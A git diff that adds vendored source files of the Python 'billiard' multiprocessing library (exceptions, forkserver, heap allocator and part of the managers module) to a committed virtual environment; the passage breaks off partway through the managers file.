b/env/Lib/site-packages/billiard/exceptions.py new file mode 100644 index 00000000..11e2e7ec --- /dev/null +++ b/env/Lib/site-packages/billiard/exceptions.py @@ -0,0 +1,52 @@ +try: + from multiprocessing import ( + ProcessError, + BufferTooShort, + TimeoutError, + AuthenticationError, + ) +except ImportError: + class ProcessError(Exception): # noqa + pass + + class BufferTooShort(ProcessError): # noqa + pass + + class TimeoutError(ProcessError): # noqa + pass + + class AuthenticationError(ProcessError): # noqa + pass + + +class TimeLimitExceeded(Exception): + """The time limit has been exceeded and the job has been terminated.""" + + def __str__(self): + return "TimeLimitExceeded%s" % (self.args, ) + + +class SoftTimeLimitExceeded(Exception): + """The soft time limit has been exceeded. This exception is raised + to give the task a chance to clean up.""" + + def __str__(self): + return "SoftTimeLimitExceeded%s" % (self.args, ) + + +class WorkerLostError(Exception): + """The worker processing a job has exited prematurely.""" + + +class Terminated(Exception): + """The worker processing a job has been terminated by user request.""" + + +class RestartFreqExceeded(Exception): + """Restarts too fast.""" + + +class CoroStop(Exception): + """Coroutine exit, as opposed to StopIteration which may + mean it should be restarted.""" + pass diff --git a/env/Lib/site-packages/billiard/forkserver.py b/env/Lib/site-packages/billiard/forkserver.py new file mode 100644 index 00000000..9e6a9c91 --- /dev/null +++ b/env/Lib/site-packages/billiard/forkserver.py @@ -0,0 +1,264 @@ +import errno +import os +import selectors +import signal +import socket +import struct +import sys +import threading + +from . import connection +from . import process +from . import reduction +from . import semaphore_tracker +from . import spawn +from . import util + +from .compat import spawnv_passfds + +__all__ = ['ensure_running', 'get_inherited_fds', 'connect_to_new_process', + 'set_forkserver_preload'] + +# +# +# + +MAXFDS_TO_SEND = 256 +UNSIGNED_STRUCT = struct.Struct('Q') # large enough for pid_t + +# +# Forkserver class +# + + +class ForkServer: + + def __init__(self): + self._forkserver_address = None + self._forkserver_alive_fd = None + self._inherited_fds = None + self._lock = threading.Lock() + self._preload_modules = ['__main__'] + + def set_forkserver_preload(self, modules_names): + '''Set list of module names to try to load in forkserver process.''' + if not all(type(mod) is str for mod in self._preload_modules): + raise TypeError('module_names must be a list of strings') + self._preload_modules = modules_names + + def get_inherited_fds(self): + '''Return list of fds inherited from parent process. + + This returns None if the current process was not started by fork + server. + ''' + return self._inherited_fds + + def connect_to_new_process(self, fds): + '''Request forkserver to create a child process. + + Returns a pair of fds (status_r, data_w). The calling process can read + the child process's pid and (eventually) its returncode from status_r. + The calling process should write to data_w the pickled preparation and + process data. + ''' + self.ensure_running() + if len(fds) + 4 >= MAXFDS_TO_SEND: + raise ValueError('too many fds') + with socket.socket(socket.AF_UNIX) as client: + client.connect(self._forkserver_address) + parent_r, child_w = os.pipe() + child_r, parent_w = os.pipe() + allfds = [child_r, child_w, self._forkserver_alive_fd, + semaphore_tracker.getfd()] + allfds += fds + try: + reduction.sendfds(client, allfds) + return parent_r, parent_w + except: + os.close(parent_r) + os.close(parent_w) + raise + finally: + os.close(child_r) + os.close(child_w) + + def ensure_running(self): + '''Make sure that a fork server is running. + + This can be called from any process. Note that usually a child + process will just reuse the forkserver started by its parent, so + ensure_running() will do nothing. + ''' + with self._lock: + semaphore_tracker.ensure_running() + if self._forkserver_alive_fd is not None: + return + + cmd = ('from billiard.forkserver import main; ' + + 'main(%d, %d, %r, **%r)') + + if self._preload_modules: + desired_keys = {'main_path', 'sys_path'} + data = spawn.get_preparation_data('ignore') + data = { + x: y for (x, y) in data.items() if x in desired_keys + } + else: + data = {} + + with socket.socket(socket.AF_UNIX) as listener: + address = connection.arbitrary_address('AF_UNIX') + listener.bind(address) + os.chmod(address, 0o600) + listener.listen() + + # all client processes own the write end of the "alive" pipe; + # when they all terminate the read end becomes ready. + alive_r, alive_w = os.pipe() + try: + fds_to_pass = [listener.fileno(), alive_r] + cmd %= (listener.fileno(), alive_r, self._preload_modules, + data) + exe = spawn.get_executable() + args = [exe] + util._args_from_interpreter_flags() + args += ['-c', cmd] + spawnv_passfds(exe, args, fds_to_pass) + except: + os.close(alive_w) + raise + finally: + os.close(alive_r) + self._forkserver_address = address + self._forkserver_alive_fd = alive_w + +# +# +# + + +def main(listener_fd, alive_r, preload, main_path=None, sys_path=None): + '''Run forkserver.''' + if preload: + if '__main__' in preload and main_path is not None: + process.current_process()._inheriting = True + try: + spawn.import_main_path(main_path) + finally: + del process.current_process()._inheriting + for modname in preload: + try: + __import__(modname) + except ImportError: + pass + + # close sys.stdin + if sys.stdin is not None: + try: + sys.stdin.close() + sys.stdin = open(os.devnull) + except (OSError, ValueError): + pass + + # ignoring SIGCHLD means no need to reap zombie processes + handler = signal.signal(signal.SIGCHLD, signal.SIG_IGN) + with socket.socket(socket.AF_UNIX, fileno=listener_fd) as listener, \ + selectors.DefaultSelector() as selector: + _forkserver._forkserver_address = listener.getsockname() + selector.register(listener, selectors.EVENT_READ) + selector.register(alive_r, selectors.EVENT_READ) + + while True: + try: + while True: + rfds = [key.fileobj for (key, events) in selector.select()] + if rfds: + break + + if alive_r in rfds: + # EOF because no more client processes left + assert os.read(alive_r, 1) == b'' + raise SystemExit + + assert listener in rfds + with listener.accept()[0] as s: + code = 1 + if os.fork() == 0: + try: + _serve_one(s, listener, alive_r, handler) + except Exception: + sys.excepthook(*sys.exc_info()) + sys.stderr.flush() + finally: + os._exit(code) + except OSError as e: + if e.errno != errno.ECONNABORTED: + raise + + +def __unpack_fds(child_r, child_w, alive, stfd, *inherited): + return child_r, child_w, alive, stfd, inherited + + +def _serve_one(s, listener, alive_r, handler): + # close unnecessary stuff and reset SIGCHLD handler + listener.close() + os.close(alive_r) + signal.signal(signal.SIGCHLD, handler) + + # receive fds from parent process + fds = reduction.recvfds(s, MAXFDS_TO_SEND + 1) + s.close() + assert len(fds) <= MAXFDS_TO_SEND + + (child_r, child_w, _forkserver._forkserver_alive_fd, + stfd, _forkserver._inherited_fds) = __unpack_fds(*fds) + semaphore_tracker._semaphore_tracker._fd = stfd + + # send pid to client processes + write_unsigned(child_w, os.getpid()) + + # reseed random number generator + if 'random' in sys.modules: + import random + random.seed() + + # run process object received over pipe + code = spawn._main(child_r) + + # write the exit code to the pipe + write_unsigned(child_w, code) + +# +# Read and write unsigned numbers +# + + +def read_unsigned(fd): + data = b'' + length = UNSIGNED_STRUCT.size + while len(data) < length: + s = os.read(fd, length - len(data)) + if not s: + raise EOFError('unexpected EOF') + data += s + return UNSIGNED_STRUCT.unpack(data)[0] + + +def write_unsigned(fd, n): + msg = UNSIGNED_STRUCT.pack(n) + while msg: + nbytes = os.write(fd, msg) + if nbytes == 0: + raise RuntimeError('should not get here') + msg = msg[nbytes:] + +# +# +# + +_forkserver = ForkServer() +ensure_running = _forkserver.ensure_running +get_inherited_fds = _forkserver.get_inherited_fds +connect_to_new_process = _forkserver.connect_to_new_process +set_forkserver_preload = _forkserver.set_forkserver_preload diff --git a/env/Lib/site-packages/billiard/heap.py b/env/Lib/site-packages/billiard/heap.py new file mode 100644 index 00000000..fc11950f --- /dev/null +++ b/env/Lib/site-packages/billiard/heap.py @@ -0,0 +1,288 @@ +# +# Module which supports allocation of memory from an mmap +# +# multiprocessing/heap.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import bisect +import errno +import io +import mmap +import os +import sys +import threading +import tempfile + +from . import context +from . import reduction +from . import util + +from ._ext import _billiard, win32 + +__all__ = ['BufferWrapper'] + +PY3 = sys.version_info[0] == 3 + +# +# Inheritable class which wraps an mmap, and from which blocks can be allocated +# + +if sys.platform == 'win32': + + class Arena: + + _rand = tempfile._RandomNameSequence() + + def __init__(self, size): + self.size = size + for i in range(100): + name = 'pym-%d-%s' % (os.getpid(), next(self._rand)) + buf = mmap.mmap(-1, size, tagname=name) + if win32.GetLastError() == 0: + break + # we have reopened a preexisting map + buf.close() + else: + exc = IOError('Cannot find name for new mmap') + exc.errno = errno.EEXIST + raise exc + self.name = name + self.buffer = buf + self._state = (self.size, self.name) + + def __getstate__(self): + context.assert_spawning(self) + return self._state + + def __setstate__(self, state): + self.size, self.name = self._state = state + self.buffer = mmap.mmap(-1, self.size, tagname=self.name) + # XXX Temporarily preventing buildbot failures while determining + # XXX the correct long-term fix. See issue #23060 + # assert win32.GetLastError() == win32.ERROR_ALREADY_EXISTS + +else: + + class Arena: + + def __init__(self, size, fd=-1): + self.size = size + self.fd = fd + if fd == -1: + if PY3: + self.fd, name = tempfile.mkstemp( + prefix='pym-%d-' % (os.getpid(),), + dir=util.get_temp_dir(), + ) + + os.unlink(name) + util.Finalize(self, os.close, (self.fd,)) + with io.open(self.fd, 'wb', closefd=False) as f: + bs = 1024 * 1024 + if size >= bs: + zeros = b'\0' * bs + for _ in range(size // bs): + f.write(zeros) + del(zeros) + f.write(b'\0' * (size % bs)) + assert f.tell() == size + else: + name = tempfile.mktemp( + prefix='pym-%d-' % (os.getpid(),), + dir=util.get_temp_dir(), + ) + self.fd = os.open( + name, os.O_RDWR | os.O_CREAT | os.O_EXCL, 0o600, + ) + util.Finalize(self, os.close, (self.fd,)) + os.unlink(name) + os.ftruncate(self.fd, size) + self.buffer = mmap.mmap(self.fd, self.size) + + def reduce_arena(a): + if a.fd == -1: + raise ValueError('Arena is unpicklable because' + 'forking was enabled when it was created') + return rebuild_arena, (a.size, reduction.DupFd(a.fd)) + + def rebuild_arena(size, dupfd): + return Arena(size, dupfd.detach()) + + reduction.register(Arena, reduce_arena) + +# +# Class allowing allocation of chunks of memory from arenas +# + + +class Heap: + + _alignment = 8 + + def __init__(self, size=mmap.PAGESIZE): + self._lastpid = os.getpid() + self._lock = threading.Lock() + self._size = size + self._lengths = [] + self._len_to_seq = {} + self._start_to_block = {} + self._stop_to_block = {} + self._allocated_blocks = set() + self._arenas = [] + # list of pending blocks to free - see free() comment below + self._pending_free_blocks = [] + + @staticmethod + def _roundup(n, alignment): + # alignment must be a power of 2 + mask = alignment - 1 + return (n + mask) & ~mask + + def _malloc(self, size): + # returns a large enough block -- it might be much larger + i = bisect.bisect_left(self._lengths, size) + if i == len(self._lengths): + length = self._roundup(max(self._size, size), mmap.PAGESIZE) + self._size *= 2 + util.info('allocating a new mmap of length %d', length) + arena = Arena(length) + self._arenas.append(arena) + return (arena, 0, length) + else: + length = self._lengths[i] + seq = self._len_to_seq[length] + block = seq.pop() + if not seq: + del self._len_to_seq[length], self._lengths[i] + + (arena, start, stop) = block + del self._start_to_block[(arena, start)] + del self._stop_to_block[(arena, stop)] + return block + + def _free(self, block): + # free location and try to merge with neighbours + (arena, start, stop) = block + + try: + prev_block = self._stop_to_block[(arena, start)] + except KeyError: + pass + else: + start, _ = self._absorb(prev_block) + + try: + next_block = self._start_to_block[(arena, stop)] + except KeyError: + pass + else: + _, stop = self._absorb(next_block) + + block = (arena, start, stop) + length = stop - start + + try: + self._len_to_seq[length].append(block) + except KeyError: + self._len_to_seq[length] = [block] + bisect.insort(self._lengths, length) + + self._start_to_block[(arena, start)] = block + self._stop_to_block[(arena, stop)] = block + + def _absorb(self, block): + # deregister this block so it can be merged with a neighbour + (arena, start, stop) = block + del self._start_to_block[(arena, start)] + del self._stop_to_block[(arena, stop)] + + length = stop - start + seq = self._len_to_seq[length] + seq.remove(block) + if not seq: + del self._len_to_seq[length] + self._lengths.remove(length) + + return start, stop + + def _free_pending_blocks(self): + # Free all the blocks in the pending list - called with the lock held + while 1: + try: + block = self._pending_free_blocks.pop() + except IndexError: + break + self._allocated_blocks.remove(block) + self._free(block) + + def free(self, block): + # free a block returned by malloc() + # Since free() can be called asynchronously by the GC, it could happen + # that it's called while self._lock is held: in that case, + # self._lock.acquire() would deadlock (issue #12352). To avoid that, a + # trylock is used instead, and if the lock can't be acquired + # immediately, the block is added to a list of blocks to be freed + # synchronously sometimes later from malloc() or free(), by calling + # _free_pending_blocks() (appending and retrieving from a list is not + # strictly thread-safe but under cPython it's atomic + # thanks to the GIL). + assert os.getpid() == self._lastpid + if not self._lock.acquire(False): + # can't acquire the lock right now, add the block to the list of + # pending blocks to free + self._pending_free_blocks.append(block) + else: + # we hold the lock + try: + self._free_pending_blocks() + self._allocated_blocks.remove(block) + self._free(block) + finally: + self._lock.release() + + def malloc(self, size): + # return a block of right size (possibly rounded up) + assert 0 <= size < sys.maxsize + if os.getpid() != self._lastpid: + self.__init__() # reinitialize after fork + with self._lock: + self._free_pending_blocks() + size = self._roundup(max(size, 1), self._alignment) + (arena, start, stop) = self._malloc(size) + new_stop = start + size + if new_stop < stop: + self._free((arena, new_stop, stop)) + block = (arena, start, new_stop) + self._allocated_blocks.add(block) + return block + +# +# Class representing a chunk of an mmap -- can be inherited +# + + +class BufferWrapper: + + _heap = Heap() + + def __init__(self, size): + assert 0 <= size < sys.maxsize + block = BufferWrapper._heap.malloc(size) + self._state = (block, size) + util.Finalize(self, BufferWrapper._heap.free, args=(block,)) + + def get_address(self): + (arena, start, stop), size = self._state + address, length = _billiard.address_of_buffer(arena.buffer) + assert size <= length + return address + start + + def get_size(self): + return self._state[1] + + def create_memoryview(self): + (arena, start, stop), size = self._state + return memoryview(arena.buffer)[start:start + size] diff --git a/env/Lib/site-packages/billiard/managers.py b/env/Lib/site-packages/billiard/managers.py new file mode 100644 index 00000000..6a496c65 --- /dev/null +++ b/env/Lib/site-packages/billiard/managers.py @@ -0,0 +1,1210 @@ +# +# Module providing the `SyncManager` class for dealing +# with shared objects +# +# multiprocessing/managers.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +# +# Imports +# + +import sys +import threading +import array + +from traceback import format_exc + +from . import connection +from . import context +from . import pool +from . import process +from . import reduction +from . import util +from . import get_context + +from queue import Queue +from time import monotonic + +__all__ = ['BaseManager', 'SyncManager', 'BaseProxy', 'Token'] + +PY3 = sys.version_info[0] == 3 + +# +# Register some things for pickling +# + + +if PY3: + def reduce_array(a): + return array.array, (a.typecode, a.tobytes()) +else: + def reduce_array(a): # noqa + return array.array, (a.typecode, a.tostring()) +reduction.register(array.array, reduce_array) + +view_types = [type(getattr({}, name)()) + for name in ('items', 'keys', 'values')] +if view_types[0] is not list: # only needed in Py3.0 + + def rebuild_as_list(obj): + return list, (list(obj), ) + for view_type in view_types: + reduction.register(view_type, rebuild_as_list) + +# +# Type for identifying shared objects +# + + +class Token: + ''' + Type to uniquely identify a shared object + ''' + __slots__ = ('typeid', 'address', 'id') + + def __init__(self, typeid, address, id): + (self.typeid, self.address, self.id) = (typeid, address, id) + + def __getstate__(self): + return (self.typeid, self.address, self.id) + + def __setstate__(self, state): + (self.typeid, self.address, self.id) = state + + def __repr__(self): + return '%s(typeid=%r, address=%r, id=%r)' % \ + (self.__class__.__name__, self.typeid, self.address, self.id) + +# +# Function for communication with a manager's server process +# + + +def dispatch(c, id, methodname, args=(), kwds={}): + ''' + Send a message to manager using connection `c` and return response + ''' + c.send((id, methodname, args, kwds)) + kind, result = c.recv() + if kind == '#RETURN': + return result + raise convert_to_error(kind, result) + + +def convert_to_error(kind, result): + if kind == '#ERROR': + return result + elif kind == '#TRACEBACK': + assert type(result) is str + return RemoteError(result) + elif kind == '#UNSERIALIZABLE': + assert type(result) is str + return RemoteError('Unserializable message: %s\n' % result) + else: + return ValueError('Unrecognized message type') + + +class RemoteError(Exception): + + def __str__(self): + return ('\n' + '-' * 75 + '\n' + str(self.args[0]) + '-' * 75) + +# +# Functions for finding the method names of an object +# + + +def all_methods(obj): + ''' + Return a list of names of methods of `obj` + ''' + temp = [] + for name in dir(obj): + func = getattr(obj, name) + if callable(func): + temp.append(name) + return temp + + +def public_methods(obj): + ''' + Return a list of names of methods of `obj` which do not start with '_' + ''' + return [name for name in all_methods(obj) if name[0] != '_'] + +# +# Server which is run in a process controlled by a manager +# + + +class Server: + ''' + Server class which runs in a process controlled by a manager object + ''' + public = ['shutdown', 'create', 'accept_connection', 'get_methods', + 'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref'] + + def __init__(self, registry, address, authkey, serializer): + assert isinstance(authkey, bytes) + self.registry = registry + self.authkey = process.AuthenticationString(authkey) + Listener, Client = listener_client[serializer] + + # do authentication later + self.listener = Listener(address=address, backlog=16) + self.address = self.listener.address + + self.id_to_obj = {'0': (None, ())} + self.id_to_refcount = {} + self.mutex = threading.RLock() + + def serve_forever(self): + ''' + Run the server forever + ''' + self.stop_event = threading.Event() + process.current_process()._manager_server = self + try: + accepter = threading.Thread(target=self.accepter) + accepter.daemon = True + accepter.start() + try: + while not self.stop_event.is_set(): + self.stop_event.wait(1) + except (KeyboardInterrupt, SystemExit): + pass + finally: + if sys.stdout != sys.__stdout__: + util.debug('resetting stdout, stderr') + sys.stdout = sys.__stdout__ + sys.stderr = sys.__stderr__ + sys.exit(0) + + def accepter(self): + while True: + try: + c = self.listener.accept() + except OSError: + continue + t = threading.Thread(target=self.handle_request, args=(c, )) + t.daemon = True + t.start() + + def handle_request(self, c): + ''' + Handle a new connection + ''' + funcname = result = request = None + try: + connection.deliver_challenge(c, self.authkey) + connection.answer_challenge(c, self.authkey) + request = c.recv() + ignore, funcname, args, kwds = request + assert funcname in self.public, '%r unrecognized' % funcname + func = getattr(self, funcname) + except Exception: + msg = ('#TRACEBACK', format_exc()) + else: + try: + result = func(c, *args, **kwds) + except Exception: + msg = ('#TRACEBACK', format_exc()) + else: + msg = ('#RETURN', result) + try: + c.send(msg) + except Exception as exc: + try: + c.send(('#TRACEBACK', format_exc())) + except Exception: + pass + util.info('Failure to send message: %r', msg) + util.info(' ... request was %r', request) + util.info(' ... exception was %r', exc) + + c.close() + + def serve_client(self, conn): + ''' + Handle requests from the proxies in a particular process/thread + ''' + util.debug('starting server thread to service %r', + threading.current_thread().name) + + recv = conn.recv + send = conn.send + id_to_obj = self.id_to_obj + + while not self.stop_event.is_set(): + + try: + methodname = obj = None + request = recv() + ident, methodname, args, kwds = request + obj, exposed, gettypeid = id_to_obj[ident] + + if methodname not in exposed: + raise AttributeError( + 'method %r of %r object is not in exposed=%r' % ( + methodname, type(obj), exposed) + ) + + function = getattr(obj, methodname) + + try: + res = function(*args, **kwds) + except Exception as exc: + msg = ('#ERROR', exc) + else: + typeid = gettypeid and gettypeid.get(methodname, None) + if typeid: + rident, rexposed = self.create(conn, typeid, res) + token = Token(typeid, self.address, rident) + msg = ('#PROXY', (rexposed, token)) + else: + msg = ('#RETURN', res) + + except AttributeError: + if methodname is None: + msg = ('#TRACEBACK', format_exc()) + else: + try: + fallback_func = self.fallback_mapping[methodname] + result = fallback_func( + self, conn, ident, obj, *args, **kwds + ) + msg = ('#RETURN', result) + except Exception: + msg = ('#TRACEBACK', format_exc()) + + except EOFError: + util.debug('got EOF -- exiting thread serving %r', + threading.current_thread().name) + sys.exit(0) + + except Exception: + msg = ('#TRACEBACK', format_exc()) + + try: + try: + send(msg) + except Exception: + send(('#UNSERIALIZABLE', repr(msg))) + except Exception as exc: + util.info('exception in thread serving %r', + threading.current_thread().name) + util.info(' ... message was %r', msg) + util.info(' ... exception was %r', exc) + conn.close() + sys.exit(1) + + def fallback_getvalue(self, conn, ident, obj): + return obj + + def fallback_str(self, conn, ident, obj): + return str(obj) + + def fallback_repr(self, conn, ident, obj): + return repr(obj) + + fallback_mapping = { + '__str__': fallback_str, + '__repr__': fallback_repr, + '#GETVALUE': fallback_getvalue, + } + + def dummy(self, c): + pass + + def debug_info(self, c): + ''' + Return some info --- useful to spot problems with refcounting + ''' + with self.mutex: + result = [] + keys = list(self.id_to_obj.keys()) + keys.sort() + for ident in keys: + if ident != '0': + result.append(' %s: refcount=%s\n %s' % + (ident, self.id_to_refcount[ident], + str(self.id_to_obj[ident][0])[:75])) + return '\n'.join(result) + + def number_of_objects(self, c): + ''' + Number of shared objects + ''' + return len(self.id_to_obj) - 1 # don't count ident='0' + + def shutdown(self, c): + ''' + Shutdown this process + ''' + try: + util.debug('Manager received shutdown message') + c.send(('#RETURN', None)) + except: + import traceback + traceback.print_exc() + finally: + self.stop_event.set() + + def create(self, c, typeid, *args, **kwds): + ''' + Create a new shared object and return its id + ''' + with self.mutex: + callable, exposed, method_to_typeid, proxytype = \ + self.registry[typeid] + + if callable is None: + assert len(args) == 1 and not kwds + obj = args[0] + else: + obj = callable(*args, **kwds) + + if exposed is None: + exposed = public_methods(obj) + if method_to_typeid is not None: + assert type(method_to_typeid) is dict + exposed = list(exposed) + list(method_to_typeid) + # convert to string because xmlrpclib + # only has 32 bit signed integers + ident = '%x' % id(obj) + util.debug('%r callable returned object with id %r', typeid, ident) + + self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid) + if ident not in self.id_to_refcount: + self.id_to_refcount[ident] = 0 + # increment the reference count immediately, to avoid + # this object being garbage collected before a Proxy + # object for it can be created. The caller of create() + # is responsible for doing a decref once the Proxy object + # has been created. + self.incref(c, ident) + return ident, tuple(exposed) + + def get_methods(self, c, token): + ''' + Return the methods of the shared object indicated by token + ''' + return tuple(self.id_to_obj[token.id][1]) + + def accept_connection(self, c, name): + ''' + Spawn a new thread to serve this connection + ''' + threading.current_thread().name = name + c.send(('#RETURN', None)) + self.serve_client(c) + + def incref(self, c, ident): + with self.mutex: + self.id_to_refcount[ident] += 1 + + def decref(self, c, ident): + with self.mutex: + assert self.id_to_refcount[ident] >= 1 + self.id_to_refcount[ident] -= 1 + if self.id_to_refcount[ident] == 0: + del self.id_to_obj[ident], self.id_to_refcount[ident] + util.debug('disposing of obj with id %r', ident) + +# +# Class to represent state of a manager +# + + +class State: + __slots__ = ['value'] + INITIAL = 0 + STARTED = 1 + SHUTDOWN = 2 + +# +# Mapping from serializer name to Listener and Client types +# + +listener_client = { + 'pickle': (connection.Listener, connection.Client), + 'xmlrpclib': (connection.XmlListener, connection.XmlClient), +} + +# +# Definition of BaseManager +# + + +class BaseManager: + ''' + Base class for managers + ''' + _registry = {} + _Server = Server + + def __init__(self, address=None, authkey=None, serializer='pickle', + ctx=None): + if authkey is None: + authkey = process.current_process().authkey + self._address = address # XXX not final address if eg ('', 0) + self._authkey = process.AuthenticationString(authkey) + self._state = State() + self._state.value = State.INITIAL + self._serializer = serializer + self._Listener, self._Client = listener_client[serializer] + self._ctx = ctx or get_context() + + def __reduce__(self): + return (type(self).from_address, + (self._address, self._authkey, self._serializer)) + + def get_server(self): + ''' + Return server object with serve_forever() method and address attribute + ''' + assert self._state.value == State.INITIAL + return Server(self._registry, self._address, + self._authkey, self._serializer) + + def connect(self): + ''' + Connect manager object to the server process + ''' + Listener, Client = listener_client[self._serializer] + conn = Client(self._address, authkey=self._authkey) + dispatch(conn, None, 'dummy') + self._state.value = State.STARTED + + def start(self, initializer=None, initargs=()): + ''' + Spawn a server process for this manager object + ''' + assert self._state.value == State.INITIAL + + if initializer is not None and not callable(initializer): + raise TypeError('initializer must be a callable') + + # pipe over which we will retrieve address of server + reader, writer = connection.Pipe(duplex=False) + + # spawn process which runs a server + self._process = self._ctx.Process( + target=type(self)._run_server, + args=(self._registry, self._address, self._authkey, + self._serializer, writer, initializer, initargs), + ) + ident = ':'.join(str(i) for i in self._process._identity) + self._process.name = type(self).__name__ + '-' + ident + self._process.start() + + # get address of server + writer.close() + self._address = reader.recv() + reader.close() + + # register a finalizer + self._state.value = State.STARTED + self.shutdown = util.Finalize( + self, type(self)._finalize_manager, + args=(self._process, self._address, self._authkey, + self._state, self._Client), + exitpriority=0 + ) + + @classmethod + def _run_server(cls, registry, address, authkey, serializer, writer, + initializer=None, initargs=()): + ''' + Create a server, report its address and run it + ''' + if initializer is not None: + initializer(*initargs) + + # create server + server = cls._Server(registry, address, authkey, serializer) + + # inform parent process of the server's address + writer.send(server.address) + writer.close() + + # run the manager + util.info('manager serving at %r', server.address) + server.serve_forever() + + def _create(self, typeid, *args, **kwds): + ''' + Create a new shared object; return the token and exposed tuple + ''' + assert self._state.value == State.STARTED, 'server not yet started' + conn = self._Client(self._address, authkey=self._authkey) + try: + id, exposed = dispatch(conn, None, 'create', + (typeid,) + args, kwds) + finally: + conn.close() + return Token(typeid, self._address, id), exposed + + def join(self, timeout=None): + ''' + Join the manager process (if it has been spawned) + ''' + if self._process is not None: + self._process.join(timeout) + if not self._process.is_alive(): + self._process = None + + def _debug_info(self): + ''' + Return some info about the servers shared objects and connections + ''' + conn = self._Client(self._address, authkey=self._authkey) + try: + return dispatch(conn, None, 'debug_info') + finally: + conn.close() + + def _number_of_objects(self): + ''' + Return the number of shared objects + ''' + conn = self._Client(self._address, authkey=self._authkey) + try: + return dispatch(conn, None, 'number_of_objects') + finally: + conn.close() + + def __enter__(self): + if self._state.value == State.INITIAL: + self.start() + assert self._state.value == State.STARTED + return self + + def __exit__(self, exc_type, exc_val, exc_tb): + self.shutdown() + + @staticmethod + def _finalize_manager(process, address, authkey, state, _Client): + ''' + Shutdown the manager process; will be registered as a finalizer + ''' + if process.is_alive(): + util.info('sending shutdown message to manager') + try: + conn = _Client(address, authkey=authkey) + try: + dispatch(conn, None, 'shutdown') + finally: + conn.close() + except Exception: + pass + + process.join(timeout=1.0) + if process.is_alive(): + util.info('manager still alive') + if hasattr(process, 'terminate'): + util.info('trying to `terminate()` manager process') + process.terminate() + process.join(timeout=0.1) + if process.is_alive(): + util.info('manager still alive after terminate') + + state.value = State.SHUTDOWN + try: + del BaseProxy._address_to_local[address] + except KeyError: + pass + + address = property(lambda self: self._address) + + @classmethod + def register(cls, typeid, callable=None, proxytype=None, exposed=None, + method_to_typeid=None, create_method=True): + ''' + Register a typeid with the manager type + ''' + if '_registry' not in cls.__dict__: + cls._registry = cls._registry.copy() + + if proxytype is None: + proxytype = AutoProxy + + exposed = exposed or getattr(proxytype, '_exposed_', None) + + method_to_typeid = ( + method_to_typeid or + getattr(proxytype, '_method_to_typeid_', None) + ) + + if method_to_typeid: + for key, value in method_to_typeid.items(): + assert type(key) is str, '%r is not a string' % key + assert type(value) is str, '%r is not a string' % value + + cls._registry[typeid] = ( + callable, exposed, method_to_typeid, proxytype + ) + + if create_method: + def temp(self, *args, **kwds): + util.debug('requesting creation of a shared %r object', typeid) + token, exp = self._create(typeid, *args, **kwds) + proxy = proxytype( + token, self._serializer, manager=self, + authkey=self._authkey, exposed=exp + ) + conn = self._Client(token.address, authkey=self._authkey) + dispatch(conn, None, 'decref', (token.id,)) + return proxy + temp.__name__ = typeid + setattr(cls, typeid, temp) + +# +# Subclass of set which get cleared after a fork +# + + +class ProcessLocalSet(set): + + def __init__(self): + util.register_after_fork(self, lambda obj: obj.clear()) + + def __reduce__(self): + return type(self), () + +# +# Definition of BaseProxy +# + + +class BaseProxy: + ''' + A base for proxies of shared objects + ''' + _address_to_local = {} + _mutex = util.ForkAwareThreadLock() + + def __init__(self, token, serializer, manager=None, + authkey=None, exposed=None, incref=True): + with BaseProxy._mutex: + tls_idset = BaseProxy._address_to_local.get(token.address, None) + if tls_idset is None: + tls_idset = util.ForkAwareLocal(), ProcessLocalSet() + BaseProxy._address_to_local[token.address] = tls_idset + + # self._tls is used to record the connection used by this + # thread to communicate with the manager at token.address + self._tls = tls_idset[0] + + # self._idset is used to record the identities of all shared + # objects for which the current process owns references and + # which are in the manager at token.address + self._idset = tls_idset[1] + + self._token = token + self._id = self._token.id + self._manager = manager + self._serializer = serializer + self._Client = listener_client[serializer][1] + + if authkey is not None: + self._authkey = process.AuthenticationString(authkey) + elif self._manager is not None: + self._authkey = self._manager._authkey + else: + self._authkey = process.current_process().authkey + + if incref: + self._incref() + + util.register_after_fork(self, BaseProxy._after_fork) + + def _connect(self): + util.debug('making connection to manager') + name = process.current_process().name + if threading.current_thread().name != 'MainThread': + name += '|' + threading.current_thread().name + conn = self._Client(self._token.address, authkey=self._authkey) + dispatch(conn, None, 'accept_connection', (name,)) + self._tls.connection = conn + + def _callmethod(self, methodname, args=(), kwds={}): + ''' + Try to call a method of the referrent and return a copy of the result + ''' + try: + conn = self._tls.connection + except AttributeError: + util.debug('thread %r does not own a connection', + threading.current_thread().name) + self._connect() + conn = self._tls.connection + + conn.send((self._id, methodname, args, kwds)) + kind, result = conn.recv() + + if kind == '#RETURN': + return result + elif kind == '#PROXY': + exposed, token = result + proxytype = self._manager._registry[token.typeid][-1] + token.address = self._token.address + proxy = proxytype( + token, self._serializer, manager=self._manager, + authkey=self._authkey, exposed=exposed + ) + conn = self._Client(token.address, authkey=self._authkey) + dispatch(conn, None, 'decref', (token.id,)) + return proxy + raise convert_to_error(kind, result) + + def _getvalue(self): + ''' + Get a copy of the value of the referent + ''' + return self._callmethod('#GETVALUE') + + def _incref(self): + conn = self._Client(self._token.address, authkey=self._authkey) + dispatch(conn, None, 'incref', (self._id,)) + util.debug('INCREF %r', self._token.id) + + self._idset.add(self._id) + + state = self._manager and self._manager._state + + self._close = util.Finalize( + self, BaseProxy._decref, + args=(self._token, self._authkey, state, + self._tls, self._idset, self._Client), + exitpriority=10 + ) + + @staticmethod + def _decref(token, authkey, state, tls, idset, _Client): + idset.discard(token.id) + + # check whether manager is still alive + if state is None or state.value == State.STARTED: + # tell manager this process no longer cares about referent + try: + util.debug('DECREF %r', token.id) + conn = _Client(token.address, authkey=authkey) + dispatch(conn, None, 'decref', (token.id,)) + except Exception as exc: + util.debug('... decref failed %s', exc) + + else: + util.debug('DECREF %r -- manager already shutdown', token.id) + + # check whether we can close this thread's connection because + # the process owns no more references to objects for this manager + if not idset and hasattr(tls, 'connection'): + util.debug('thread %r has no more proxies so closing conn', + threading.current_thread().name) + tls.connection.close() + del tls.connection + + def _after_fork(self): + self._manager = None + try: + self._incref() + except Exception as exc: + # the proxy may just be for a manager which has shutdown + util.info('incref failed: %s', exc) + + def __reduce__(self): + kwds = {} + if context.get_spawning_popen() is not None: + kwds['authkey'] = self._authkey + + if getattr(self, '_isauto', False): + kwds['exposed'] = self._exposed_ + return (RebuildProxy, + (AutoProxy, 